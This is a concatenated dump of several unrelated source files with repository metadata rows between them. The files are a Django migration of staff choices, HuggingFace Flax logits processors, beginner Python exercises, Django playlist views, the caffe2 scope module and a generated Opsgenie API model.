        (141, 'Julie Piacentine'), (49, 'Aaron Platte'), (222, 'Robert Pleshar'), (206, 'Laura Pontillo'),
        (91, 'Darryl Poole'), (160, 'Karen Prack'), (173, 'Mallory A Price'), (262, 'Bill Pugh'),
        (264, 'Xiaowen Qian'), (170, 'Liping Qin'), (209, 'Sheila Ralston'), (210, 'Emily Raney'),
        (216, 'Laura Ring'), (4842, 'Jason Robertson'), (223, 'Rachel Rosenberg'), (92, 'Darrin Rosenthal'),
        (45, 'Andrew Rusin'), (194, 'Marlis J. Saleh'), (208, 'Patricia Sayre-McCoy'), (109, 'George Schell'),
        (183, 'Margaret A. Schilt'), (260, 'William A. Schwesig'), (146, 'Joseph T Scott'), (104, 'Fred Seaton'),
        (143, 'James Server'), (198, 'Natasha Sharp'), (4879, 'Allyson E Smally'), (199, 'Nancy Spiegel'),
        (161, 'Kaitlin A Springmier'), (224, 'Rebecca Starkey'), (106, 'Julie R. Stauffer'), (80, 'Carol Stewart'),
        (244, 'Christopher Alexander Straughn'), (251, 'Teresa E Sullivan'), (1157, 'Sem C Sutter'),
        (144, 'James M. Swanson'), (93, 'Deborah Taylor'), (64, 'Brandon Tharp'), (72, 'Christie Thomas'),
        (101, 'Emily Anne Treptow'), (53, 'Andrea Twiss-Brooks'), (188, 'Marcene Tyler'), (81, 'Catherine Uecker'),
        (151, 'Keith Waclena'), (259, 'Larisa Walsh'), (176, 'Mary Lee Ward'), (231, 'Sarah G. Wenzel'),
        (94, 'Debra A Werner'), (171, 'Linda Wheatley-Irving'), (263, 'William White'), (190, 'Peggy Wilkins'),
        (112, "G'Jordan Williams"), (203, 'Patricia A. Williams'), (246, 'Shelia Wright-Coney'),
        (133, 'Jiaxun Benjamin Wu'), (127, 'Jin Xu'), (268, 'Ayako Yoshimura'), (163, 'Kathy Zadrozny'),
        (270, 'Yuan Zhou'), (271, 'Xiaoquan Zhu'), (5090, 'Karen Yu'),
    ]

    dependencies = [
        ('findingaids', '0018_findingaidspage_banner_feature'),
    ]

    operations = [
        migrations.AlterField(
            model_name='findingaidspage',
            name='content_specialist',
            field=models.ForeignKey(choices=STAFF_PAGE_CHOICES, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='findingaids_findingaidspage_content_specialist', to='staff.StaffPage'),
        ),
        migrations.AlterField(
            model_name='findingaidspage',
            name='editor',
            field=models.ForeignKey(choices=STAFF_PAGE_CHOICES, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='findingaids_findingaidspage_editor', to='staff.StaffPage'),
        ),
        migrations.AlterField(
            model_name='findingaidspage',
            name='page_maintainer',
            field=models.ForeignKey(choices=STAFF_PAGE_CHOICES, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='findingaids_findingaidspage_maintainer', to='staff.StaffPage'),
        ),
    ]
| [
"jej@moss.lib.uchicago.edu"
] | jej@moss.lib.uchicago.edu |
2e028dca7ed2e92d073356ef6d2bee07d82639ca | ff0c718b4be5f26ae0ead4b6419255747c679c00 | /src/transformers/generation_flax_logits_process.py | 12442917759b91ac3ce450e5ea9c8740bb76d225 | [
"Apache-2.0"
] | permissive | elgeish/transformers | cb80d4026ebed67eb2ea8efd07d972f03ceb479f | c016dbdbdaf79339ae6d275d4651dc9f380be055 | refs/heads/master | 2021-11-25T19:28:09.297523 | 2021-11-06T14:33:47 | 2021-11-06T14:33:47 | 245,088,820 | 1 | 3 | Apache-2.0 | 2020-03-05T06:43:47 | 2020-03-05T06:43:46 | null | UTF-8 | Python | false | false | 11,502 | py | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
from abc import ABC
import jax
import jax.lax as lax
import jax.numpy as jnp
from .file_utils import add_start_docstrings
from .utils.logging import get_logger
logger = get_logger(__name__)
LOGITS_PROCESSOR_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`jnp.ndarray` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`~transformers.PreTrainedTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
scores (:obj:`jnp.ndarray` of shape :obj:`(batch_size, config.vocab_size)`):
Prediction scores of a language modeling head. These can be logits for each vocabulary when not using beam
search or log softmax for each vocabulary token when using beam search
kwargs:
Additional logits processor specific kwargs.
Return:
:obj:`jnp.ndarray` of shape :obj:`(batch_size, config.vocab_size)`: The processed prediction scores.
"""
class FlaxLogitsProcessor(ABC):
    """Abstract base class for all logit processors applied during generation."""

    @add_start_docstrings(LOGITS_PROCESSOR_INPUTS_DOCSTRING)
    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray) -> jnp.ndarray:
        """Flax method for processing logits."""
        # Subclasses must override; calling the base class directly is an error.
        message = f"{self.__class__} is an abstract class. Only classes inheriting this class can be called."
        raise NotImplementedError(message)
class FlaxLogitsWarper(ABC):
    """Abstract base class for logit warpers used with multinomial sampling."""

    @add_start_docstrings(LOGITS_PROCESSOR_INPUTS_DOCSTRING)
    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray) -> jnp.ndarray:
        """Flax method for warping logits."""
        # Subclasses must override; calling the base class directly is an error.
        message = f"{self.__class__} is an abstract class. Only classes inheriting this class can be called."
        raise NotImplementedError(message)
class FlaxLogitsProcessorList(list):
    """
    A plain ``list`` of :class:`~transformers.FlaxLogitsProcessor` /
    :class:`~transformers.FlaxLogitsWarper` instances with a ``__call__`` that
    threads the ``scores`` tensor through every member in order.
    """

    @add_start_docstrings(LOGITS_PROCESSOR_INPUTS_DOCSTRING)
    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int, **kwargs) -> jnp.ndarray:
        for processor in self:
            function_args = inspect.signature(processor.__call__).parameters
            # Processors with only (input_ids, scores, cur_len) get the plain call.
            if len(function_args) <= 3:
                scores = processor(input_ids, scores, cur_len)
                continue
            # Processors with extra parameters require every one of them in kwargs.
            missing = [arg for arg in list(function_args.keys())[2:] if arg not in kwargs]
            if missing:
                raise ValueError(
                    f"Make sure that all the required parameters: {list(function_args.keys())} for "
                    f"{processor.__class__} are passed to the logits processor."
                )
            scores = processor(input_ids, scores, cur_len, **kwargs)
        return scores
class FlaxTemperatureLogitsWarper(FlaxLogitsWarper):
    r"""
    :class:`transformers.LogitsWarper` that rescales the logits distribution by a temperature
    (exponential scaling of the output probability distribution).

    Args:
        temperature (:obj:`float`):
            The value used to module the logits distribution.
    """

    def __init__(self, temperature: float):
        is_valid = isinstance(temperature, float) and temperature > 0
        if not is_valid:
            raise ValueError(f"`temperature` has to be a strictly positive float, but is {temperature}")
        self.temperature = temperature

    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
        # Dividing logits by T > 1 flattens the distribution; T < 1 sharpens it.
        return scores / self.temperature
class FlaxTopPLogitsWarper(FlaxLogitsWarper):
    """
    :class:`transformers.LogitsWarper` that performs top-p (nucleus) filtering, i.e. keeping only the most
    probable tokens whose cumulative probability reaches :obj:`top_p`.

    Args:
        top_p (:obj:`float`):
            If set to < 1, only the most probable tokens with probabilities that add up to :obj:`top_p` or higher are
            kept for generation.
        filter_value (:obj:`float`, `optional`, defaults to :obj:`-float("Inf")`):
            All filtered values will be set to this float value.
        min_tokens_to_keep (:obj:`int`, `optional`, defaults to 1):
            Minimum number of tokens that cannot be filtered.
    """

    def __init__(self, top_p: float, filter_value: float = -float("Inf"), min_tokens_to_keep: int = 1):
        if not isinstance(top_p, float) or (top_p < 0 or top_p > 1.0):
            raise ValueError(f"`top_p` has to be a float > 0 and < 1, but is {top_p}")
        self.top_p = top_p
        self.filter_value = filter_value
        self.min_tokens_to_keep = min_tokens_to_keep

    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
        # Sort the full vocabulary (descending) so the cumulative probability
        # mass can be computed over a prefix of tokens.
        topk_scores, topk_indices = lax.top_k(scores, scores.shape[-1])
        mask_scores = jnp.full_like(scores, self.filter_value)
        cumulative_probs = jax.nn.softmax(topk_scores, axis=-1).cumsum(axis=-1)
        score_mask = cumulative_probs < self.top_p
        # include the token that pushes the cumulative mass over top_p as well.
        # `.at[...].set(...)` replaces `jax.ops.index_update`, which is
        # deprecated and removed from current JAX releases.
        score_mask |= jnp.roll(score_mask, 1).at[:, 0].set(True)
        # always keep at least `min_tokens_to_keep` of the most probable tokens
        score_mask = score_mask.at[:, : self.min_tokens_to_keep].set(True)
        topk_next_scores = jnp.where(score_mask, topk_scores, mask_scores)
        # Undo the sort so scores line up with vocabulary indices again.
        next_scores = jax.lax.sort_key_val(topk_indices, topk_next_scores)[-1]
        return next_scores
class FlaxTopKLogitsWarper(FlaxLogitsWarper):
    r"""
    :class:`transformers.LogitsWarper` that performs top-k, i.e. restricting to the k highest probability elements.

    Args:
        top_k (:obj:`int`):
            The number of highest probability vocabulary tokens to keep for top-k-filtering.
        filter_value (:obj:`float`, `optional`, defaults to :obj:`-float("Inf")`):
            All filtered values will be set to this float value.
        min_tokens_to_keep (:obj:`int`, `optional`, defaults to 1):
            Minimum number of tokens that cannot be filtered.
    """

    def __init__(self, top_k: int, filter_value: float = -float("Inf"), min_tokens_to_keep: int = 1):
        if not isinstance(top_k, int) or top_k <= 0:
            raise ValueError(f"`top_k` has to be a strictly positive integer, but is {top_k}")
        self.top_k = top_k
        self.filter_value = filter_value
        self.min_tokens_to_keep = min_tokens_to_keep

    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
        batch_size, vocab_size = scores.shape
        # Start from a fully-masked score matrix, flattened so a single
        # scatter can restore the kept entries for the whole batch.
        next_scores_flat = jnp.full(batch_size * vocab_size, self.filter_value)
        topk = min(max(self.top_k, self.min_tokens_to_keep), scores.shape[-1])  # Safety check
        topk_scores, topk_indices = lax.top_k(scores, topk)
        # Offset each row's indices into the flattened (batch * vocab) layout.
        shift = jnp.broadcast_to((jnp.arange(batch_size) * vocab_size)[:, None], (batch_size, topk)).flatten()
        topk_scores_flat = topk_scores.flatten()
        topk_indices_flat = topk_indices.flatten() + shift
        # `.at[...].set(...)` replaces `jax.ops.index_update`, which is
        # deprecated and removed from current JAX releases.
        next_scores_flat = next_scores_flat.at[topk_indices_flat].set(topk_scores_flat)
        next_scores = next_scores_flat.reshape(batch_size, vocab_size)
        return next_scores
class FlaxForcedBOSTokenLogitsProcessor(FlaxLogitsProcessor):
    r"""
    :class:`~transformers.FlaxLogitsProcessor` that enforces the specified token as the first generated token.

    Args:
        bos_token_id (:obj:`int`):
            The id of the token to force as the first generated token.
    """

    def __init__(self, bos_token_id: int):
        self.bos_token_id = bos_token_id

    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
        new_scores = jnp.full(scores.shape, -float("inf"))
        # apply_penalty is 1 only while generating the very first token (cur_len == 1).
        apply_penalty = 1 - jnp.bool_(cur_len - 1)
        # Force the BOS token by giving it score 0 and every other token -inf.
        # `.at[...].set(...)` replaces `jax.ops.index_update`, which is
        # deprecated and removed from current JAX releases.
        scores = jnp.where(apply_penalty, new_scores.at[:, self.bos_token_id].set(0), scores)
        return scores
class FlaxForcedEOSTokenLogitsProcessor(FlaxLogitsProcessor):
    r"""
    :class:`~transformers.FlaxLogitsProcessor` that enforces the specified token as the last generated token when
    :obj:`max_length` is reached.

    Args:
        max_length (:obj:`int`):
            The maximum length of the sequence to be generated.
        eos_token_id (:obj:`int`):
            The id of the token to force as the last generated token when :obj:`max_length` is reached.
    """

    def __init__(self, max_length: int, eos_token_id: int):
        self.max_length = max_length
        self.eos_token_id = eos_token_id

    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
        new_scores = jnp.full(scores.shape, -float("inf"))
        # apply_penalty is 1 only on the final step (cur_len == max_length - 1).
        apply_penalty = 1 - jnp.bool_(cur_len - self.max_length + 1)
        # Force the EOS token by giving it score 0 and every other token -inf.
        # `.at[...].set(...)` replaces `jax.ops.index_update`, which is
        # deprecated and removed from current JAX releases.
        scores = jnp.where(apply_penalty, new_scores.at[:, self.eos_token_id].set(0), scores)
        return scores
class FlaxMinLengthLogitsProcessor(FlaxLogitsProcessor):
    r"""
    :class:`transformers.FlaxLogitsProcessor` enforcing a min-length by setting EOS probability to 0.

    Args:
        min_length (:obj:`int`):
            The minimum length below which the score of :obj:`eos_token_id` is set to :obj:`-float("Inf")`.
        eos_token_id (:obj:`int`):
            The id of the `end-of-sequence` token.
    """

    def __init__(self, min_length: int, eos_token_id: int):
        if not isinstance(min_length, int) or min_length < 0:
            raise ValueError(f"`min_length` has to be a positive integer, but is {min_length}")
        if not isinstance(eos_token_id, int) or eos_token_id < 0:
            raise ValueError(f"`eos_token_id` has to be a positive integer, but is {eos_token_id}")
        self.min_length = min_length
        self.eos_token_id = eos_token_id

    def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
        # apply_penalty is 1 while cur_len < min_length, 0 afterwards.
        apply_penalty = 1 - jnp.clip(cur_len - self.min_length, 0, 1)
        # Suppress EOS until the minimum length has been generated.
        # `.at[...].set(...)` replaces `jax.ops.index_update`, which is
        # deprecated and removed from current JAX releases.
        scores = jnp.where(apply_penalty, scores.at[:, self.eos_token_id].set(-float("inf")), scores)
        return scores
| [
"noreply@github.com"
] | elgeish.noreply@github.com |
e1f003b7a5710057b5f83fb6a06df9cb3bdbece6 | 0129b016055daa1aaa1e9e0911f271fa7b38e27e | /programacao_estruturada/20192_166/for/fabio03_questao07.py | cd4394adf0a9e02d7f4115cc0e5c3e96b425cfb6 | [] | no_license | rogeriosilva-ifpi/teaching-tds-course | 7c43ff17d6677aef7b42071929b3de8361748870 | 771ccdc4dc932d0ef5ce6ba61a02b5ee11920d4c | refs/heads/master | 2022-04-04T01:08:45.157185 | 2020-01-30T19:36:57 | 2020-01-30T19:36:57 | 206,439,119 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | def programa():
numero = int(input('Número: '))
limite = numero + 1
soma = 0
for i in range(1, limite):
soma = soma + i
print('Resultado:', soma)
programa()
| [
"rogerio.silva@ifpi.edu.br"
] | rogerio.silva@ifpi.edu.br |
6dcf58f3fdc4af5e1c6f72c92a3d68ba9e34b60c | 34745a8d54fa7e3d9e4237415eb52e507508ad79 | /Python Fundamentals/04 Functions/Exercises/09_Factorial_Division.py | 7a8f98167d64d2071b173c43e8018a4076dbb28f | [] | no_license | DilyanTsenkov/SoftUni-Software-Engineering | 50476af0dc88b267d72c56fa87eeb88d841164b2 | fe446e3a50a00bb2e48d71ab8f783e0a4a406094 | refs/heads/main | 2023-08-12T18:18:42.144210 | 2021-09-25T11:10:38 | 2021-09-25T11:10:38 | 317,235,419 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | def factorial(num1, num2):
first_factorial = first_number
second_factorial = second_number
for i in range(1, num1):
first_factorial *= (first_number - i)
for i in range(1, num2):
second_factorial *= (second_number - i)
return first_factorial / second_factorial
# Script entry point: read the two operands from stdin, then print
# first_number! / second_number! rounded to two decimal places.
# NOTE(review): ``factorial`` above reads the module-level names
# ``first_number`` and ``second_number`` directly (instead of its own
# parameters), so these variable names must not be renamed.
first_number = int(input())
second_number = int(input())
print(f"{(factorial(first_number, second_number)):.2f}")
| [
"noreply@github.com"
] | DilyanTsenkov.noreply@github.com |
15c17f24a24cf077d10cb8262277e8ae5cbf8997 | d696454b3e3473a45e0bb486e93f3742493c86a0 | /music/views/playlist.py | 259f2b90dfa81dcf5dc5cea323f74b53d55c7dde | [] | no_license | jmg/music_camping | 430d04e1c8dec28816975daa8fa5375f2eb02435 | 72816647f70bb0afca5899bad5d1cfbaef4ff889 | refs/heads/master | 2021-06-20T01:57:30.540852 | 2017-01-04T05:11:28 | 2017-01-04T05:11:28 | 40,454,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,274 | py | from base import BaseView
from music.services.song import SongService
from music.services.playlist import PlayListService
from music.models import PlayList, Song, PlayListSong
from django.conf import settings
import threading
class PlayingView(BaseView):
    """Render the playlist page with the current playlist and player state."""

    url = r"^playlist$"

    def get(self, *args, **kwargs):
        # Gather everything the playlist template needs in one context dict.
        context = {
            "playlist": PlayListService().get_playlist(),
            "player_data": SongService().get_player_data(),
            "settings": settings,
        }
        return self.render_to_response(context)
class ChangeSongView(BaseView):
    """Skip to the next or previous song and return the new song as JSON."""

    def post(self, *args, **kwargs):
        # Presence of the "next"/"prev" POST keys selects the direction.
        is_next = self.request.POST.get("next") is not None
        is_prev = self.request.POST.get("prev") is not None
        try:
            # Bug fix: the original discarded the service's return value and
            # then referenced an undefined local `playlist_song`, raising a
            # NameError on every successful call.
            # NOTE(review): assumes play_next_song returns the PlayListSong
            # now playing -- confirm against SongService.
            playlist_song = SongService().play_next_song(is_next=is_next, is_prev=is_prev)
        except Exception as e:
            return self.json_response({"error": str(e)})
        return self.response(playlist_song.song.to_json())
class PlayView(BaseView):
    """Start playback of the song given by POST['song_id']."""
    def post(self, *args, **kwrags):
        song_id = self.request.POST.get("song_id")
        SongService().play_song(song_id)
        return self.response("ok")
class StopView(BaseView):
    """Stop the player."""
    def post(self, *args, **kwrags):
        service = SongService()
        service.stop_song()
        return self.response("ok")
class PauseView(BaseView):
    """Pause the player."""
    def post(self, *args, **kwrags):
        service = SongService()
        service.pause_song()
        return self.response("ok")
class SelectView(BaseView):
    """Render the song-selection landing page (site root)."""
    url = r"^$"
    def get(self, *args, **kwrags):
        # No context is needed; the template drives the page.
        return self.render_to_response({})
class AddView(BaseView):
    """Append the song given by POST['song_id'] to the playlist."""
    def post(self, *args, **kwrags):
        song_id = self.request.POST.get("song_id")
        try:
            SongService().add_song(song_id)
        except Exception as e:
            # Service-level failures are reported back as JSON.
            return self.json_response({"error": str(e)})
        return self.response("ok")
class DeleteView(BaseView):
    """Remove the song given by POST['song_id'] from the playlist."""
    def post(self, *args, **kwrags):
        song_id = self.request.POST.get("song_id")
        try:
            SongService().delete_song(song_id)
        except Exception as e:
            # Service-level failures are reported back as JSON.
            return self.json_response({"error": str(e)})
        return self.response("ok")
class PlayingListView(BaseView):
    """Feed the playlist datatable; columns 0 and 3 are server-rendered."""
    def get(self, *args, **kwargs):
        playlist = PlayListService().get_playlist()
        songs = [entry.song for entry in
                 PlayListSong.objects.filter(playlist=playlist)]
        render_stream = lambda song: self.render(
            "playlist/song_stream.html", {"song": song, "playlist": playlist})
        render_actions = lambda song: self.render(
            "playlist/actions.html", {"song": song, "playlist": playlist})
        # Column index -> renderer callable or model attribute name.
        column_map = {0: render_stream, 1: 'album', 2: 'artist', 3: render_actions}
        # Column index -> attribute to sort by (None = unsortable column).
        sort_map = {0: 'name', 1: 'album', 2: 'artist', 3: None}
        return SongService().open_search(self.request, column_map, sort_map, qs=songs)
class CurrentSongView(BaseView):
    """Render the currently-playing song widget."""
    def get(self, *args, **kwrags):
        context = {
            "playlist": PlayListService().get_playlist(),
            "player_data": SongService().get_player_data(),
        }
        return self.render_to_response(context)
class MoveSongView(BaseView):
    """Move one song up or down inside the playlist."""
    def post(self, *args, **kwrags):
        post = self.request.POST
        song_id = post.get("song_id")
        direction = post.get("direction")
        try:
            SongService().move_song(song_id, direction)
        except Exception as e:
            return self.json_response({"error": str(e)})
        return self.response("ok")
class BulkMoveSongView(BaseView):
    """Persist a bulk reordering of the playlist."""
    def post(self, *args, **kwrags):
        payload = self.request.POST.get("data")
        SongService().bulk_move_songs(payload)
        return self.response("ok")
class SetVolumeView(BaseView):
    """Set the player volume from POST['volume']."""
    def post(self, *args, **kwrags):
        # Passed through untouched; presumably the service parses the
        # value -- TODO confirm expected range/type.
        SongService().set_volume(self.request.POST.get("volume"))
        return self.response("ok")
class SetPositionView(BaseView):
    """Seek the player to POST['position'] (defaults to 0)."""
    def post(self, *args, **kwrags):
        # int() mirrors the original coercion; presumably seconds --
        # TODO confirm the unit against SongService.set_position.
        target = int(self.request.POST.get("position", 0))
        SongService().set_position(target)
        return self.response("ok")
class ClearView(BaseView):
    """Remove every song from the current playlist."""
    def post(self, *args, **kwrags):
        # Wholesale removal is delegated to the playlist service.
        PlayListService().clear()
return self.response("ok") | [
"jmg.utn@gmail.com"
] | jmg.utn@gmail.com |
f45a472394de6a4dc8569170a4d0b8cb76b5f712 | 8a5f8dfdd038590a579d14a84558cce2bb930b22 | /AICamera/app/src/main/cpp/caffe2/python/scope.py | 7aa881c0ca815c4f51643bb33d182b18b967b95a | [
"MIT"
] | permissive | blackxer/AICamera | ebc94c663e6f2ea6e8c81290a64bce4e7d369ed9 | 4f0a6a09a2288da2ec7140744b5c2862df114c78 | refs/heads/master | 2020-08-11T19:53:42.388828 | 2019-10-16T01:19:59 | 2019-10-16T01:19:59 | 214,616,987 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,465 | py | ## @package scope
# Module caffe2.python.scope
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import contextlib
import threading
from past.builtins import basestring
from caffe2.proto import caffe2_pb2
# The name scope and device scope when creating a new operator.
_NAMESCOPE_SEPARATOR = '/'
_threadlocal_scope = threading.local()
def CurrentNameScope():
    """Return the thread-local name-scope prefix, creating it as '' if unset."""
    global _threadlocal_scope
    try:
        return _threadlocal_scope.namescope
    except AttributeError:
        # First access on this thread: initialise to the empty scope.
        _threadlocal_scope.namescope = ''
        return ''
def CurrentDeviceScope():
    """Return the thread-local device scope, or None when none is active."""
    global _threadlocal_scope
    try:
        return _threadlocal_scope.devicescope
    except AttributeError:
        # First access on this thread: no device scope yet.
        _threadlocal_scope.devicescope = None
        return None
@contextlib.contextmanager
def NameScope(prefix, reset=False):
    """Scope newly created operators under *prefix*.

    With reset=True the prefix replaces the current thread-local scope
    instead of being appended; the previous scope is restored on exit.
    """
    global _threadlocal_scope
    assert isinstance(prefix, basestring) or prefix is None, \
        "NameScope takes in a string as its argument."
    saved = CurrentNameScope()
    suffix = prefix + _NAMESCOPE_SEPARATOR if prefix else ''
    _threadlocal_scope.namescope = suffix if reset else saved + suffix
    try:
        yield
    finally:
        assert _threadlocal_scope.namescope.endswith(suffix), \
            "The namescope variable is changed from outside NameScope() calls."
        _threadlocal_scope.namescope = saved
@contextlib.contextmanager
def DeviceScope(scope, node_name=None):
    """Install *scope* (a caffe2_pb2.DeviceOption) as the thread-local
    device scope for the duration of the `with` block.

    Either *scope* or *node_name* must be provided.  A nested scope
    inherits node_name and extra_info from the enclosing scope (see the
    merge steps below); the previous scope is restored on exit.
    """
    new_scope = caffe2_pb2.DeviceOption()
    if scope:
        assert isinstance(scope, caffe2_pb2.DeviceOption), \
            "DeviceScope takes in a caffe2_pb2.DeviceOption as its argument."
        new_scope.CopyFrom(scope)
    else:
        assert node_name, "At least one argument should be non-null in DeviceScope"
    # rewrite node_name if it is explicitly given
    if node_name:
        new_scope.node_name = node_name
    global _threadlocal_scope
    old_scope = CurrentDeviceScope()
    # nested scope should inherit the node_name if it is not explicitly set
    if old_scope and old_scope.HasField('node_name') and \
            not new_scope.HasField('node_name'):
        new_scope.node_name = old_scope.node_name
    # nested scope should inherit the extra_info and merged it with new extra_info
    if old_scope and hasattr(old_scope, 'extra_info'):
        new_scope.extra_info.extend(old_scope.extra_info)
        new_scope.extra_info.sort()
    _threadlocal_scope.devicescope = new_scope
    try:
        yield
    finally:
        # Guard against callers mutating the scope behind our back.
        assert _threadlocal_scope.devicescope == new_scope, \
            "The device scope is changed from outside DeviceScope() calls."
        _threadlocal_scope.devicescope = old_scope
@contextlib.contextmanager
def EmptyDeviceScope():
    """Temporarily clear the thread-local device scope.

    Lets callers 'disable' the device-scope behaviour so the device option
    is controlled at the NetDef::DeviceOption level instead of being
    injected per OperatorDef: CurrentDeviceScope() reports None while this
    context is active, and the previous scope is restored on exit.
    """
    previous = CurrentDeviceScope()
    try:
        _threadlocal_scope.devicescope = None
        yield
    finally:
        _threadlocal_scope.devicescope = previous
| [
"zhangwei@egova.com.cn"
] | zhangwei@egova.com.cn |
32721484c00e4274922c0d5dce36abc0b6575e1b | d1c67f2031d657902acef4411877d75b992eab91 | /swagger_client/models/team_routing_rule.py | 91124b752ab07d247307aaaa3c98962cbd641c5d | [] | no_license | Certn/opsgenie-python | c6e6a7f42394499e5224d679cc9a449042fcf9c3 | bd5f402f97d591e4082b38c938cbabca4cf29787 | refs/heads/master | 2023-01-01T10:45:13.132455 | 2020-10-27T17:40:01 | 2020-10-27T17:40:01 | 307,769,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,731 | py | # coding: utf-8
"""
Opsgenie REST API
Opsgenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class TeamRoutingRule(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'is_default': 'bool',
'order': 'int',
'criteria': 'Filter',
'timezone': 'str',
'time_restriction': 'TimeRestrictionInterval',
'notify': 'Recipient'
}
attribute_map = {
'id': 'id',
'name': 'name',
'is_default': 'isDefault',
'order': 'order',
'criteria': 'criteria',
'timezone': 'timezone',
'time_restriction': 'timeRestriction',
'notify': 'notify'
}
def __init__(self, id=None, name=None, is_default=None, order=None, criteria=None, timezone=None, time_restriction=None, notify=None): # noqa: E501
"""TeamRoutingRule - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._is_default = None
self._order = None
self._criteria = None
self._timezone = None
self._time_restriction = None
self._notify = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if is_default is not None:
self.is_default = is_default
if order is not None:
self.order = order
if criteria is not None:
self.criteria = criteria
if timezone is not None:
self.timezone = timezone
if time_restriction is not None:
self.time_restriction = time_restriction
if notify is not None:
self.notify = notify
@property
def id(self):
"""Gets the id of this TeamRoutingRule. # noqa: E501
:return: The id of this TeamRoutingRule. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this TeamRoutingRule.
:param id: The id of this TeamRoutingRule. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this TeamRoutingRule. # noqa: E501
:return: The name of this TeamRoutingRule. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this TeamRoutingRule.
:param name: The name of this TeamRoutingRule. # noqa: E501
:type: str
"""
self._name = name
@property
def is_default(self):
"""Gets the is_default of this TeamRoutingRule. # noqa: E501
:return: The is_default of this TeamRoutingRule. # noqa: E501
:rtype: bool
"""
return self._is_default
@is_default.setter
def is_default(self, is_default):
"""Sets the is_default of this TeamRoutingRule.
:param is_default: The is_default of this TeamRoutingRule. # noqa: E501
:type: bool
"""
self._is_default = is_default
@property
def order(self):
"""Gets the order of this TeamRoutingRule. # noqa: E501
:return: The order of this TeamRoutingRule. # noqa: E501
:rtype: int
"""
return self._order
@order.setter
def order(self, order):
"""Sets the order of this TeamRoutingRule.
:param order: The order of this TeamRoutingRule. # noqa: E501
:type: int
"""
self._order = order
@property
def criteria(self):
"""Gets the criteria of this TeamRoutingRule. # noqa: E501
:return: The criteria of this TeamRoutingRule. # noqa: E501
:rtype: Filter
"""
return self._criteria
@criteria.setter
def criteria(self, criteria):
"""Sets the criteria of this TeamRoutingRule.
:param criteria: The criteria of this TeamRoutingRule. # noqa: E501
:type: Filter
"""
self._criteria = criteria
@property
def timezone(self):
"""Gets the timezone of this TeamRoutingRule. # noqa: E501
:return: The timezone of this TeamRoutingRule. # noqa: E501
:rtype: str
"""
return self._timezone
@timezone.setter
def timezone(self, timezone):
"""Sets the timezone of this TeamRoutingRule.
:param timezone: The timezone of this TeamRoutingRule. # noqa: E501
:type: str
"""
self._timezone = timezone
@property
def time_restriction(self):
"""Gets the time_restriction of this TeamRoutingRule. # noqa: E501
:return: The time_restriction of this TeamRoutingRule. # noqa: E501
:rtype: TimeRestrictionInterval
"""
return self._time_restriction
@time_restriction.setter
def time_restriction(self, time_restriction):
"""Sets the time_restriction of this TeamRoutingRule.
:param time_restriction: The time_restriction of this TeamRoutingRule. # noqa: E501
:type: TimeRestrictionInterval
"""
self._time_restriction = time_restriction
@property
def notify(self):
"""Gets the notify of this TeamRoutingRule. # noqa: E501
:return: The notify of this TeamRoutingRule. # noqa: E501
:rtype: Recipient
"""
return self._notify
@notify.setter
def notify(self, notify):
"""Sets the notify of this TeamRoutingRule.
:param notify: The notify of this TeamRoutingRule. # noqa: E501
:type: Recipient
"""
self._notify = notify
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
